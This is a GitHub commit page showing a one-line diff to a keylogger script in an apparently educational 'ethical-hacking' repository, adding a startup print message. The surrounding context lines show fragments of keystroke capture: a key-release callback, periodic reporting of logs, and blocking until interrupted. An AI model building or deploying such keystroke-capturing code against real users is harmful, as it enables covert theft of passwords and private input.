We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent af7dff5 commit ecbc855Copy full SHA for ecbc855
ethical-hacking/keylogger/keylogger.py
@@ -102,6 +102,8 @@ def start(self):
102
keyboard.on_release(callback=self.callback)
103
# start reporting the keylogs
104
self.report()
105
+ # make a simple message
106
+ print(f"{datetime.now()} - Started keylogger")
107
# block the current thread, wait until CTRL+C is pressed
108
keyboard.wait()
109
0 commit comments